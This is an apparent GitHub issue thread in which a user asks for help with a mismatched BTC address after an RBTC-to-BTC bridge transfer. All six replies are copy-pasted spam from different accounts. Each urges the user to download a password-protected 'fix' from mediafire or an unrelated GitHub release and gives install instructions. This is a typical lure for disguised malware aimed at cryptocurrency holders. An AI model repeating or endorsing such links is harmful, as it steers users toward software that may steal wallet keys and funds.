### ISSUE TITLE
Help with a 2wp transaction

### ISSUE THREAD

**Issue by bitcoinuser** [rsksmart/2wp-app#801]
Hi,

The steps:

1- I connected on https://app.2wp.rootstock.io/ using OKX chrome extension: https://chromewebstore.google.com/detail/okx-wallet/mcohilncbfahbmgdjkbpemcciiolgcge
Obs. I added custom network RSK on OKX wallet

2- I started a conversion from RBTC to BTC: https://app.2wp.rootstock.io/status/txId/0xb22598c6ba9fccb50ef85d50f421877e35f945fd4837547d46777a8d7c1b14d5

After all this, I tried to import the private key from OKX wallet to Electrum, but I see a different BTC address than the one here:https://app.2wp.rootstock.io/status/txId/0xb22598c6ba9fccb50ef85d50f421877e35f945fd4837547d46777a8d7c1b14d5

How to import the OKX private key to see the correct BTC address?

Thanks.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
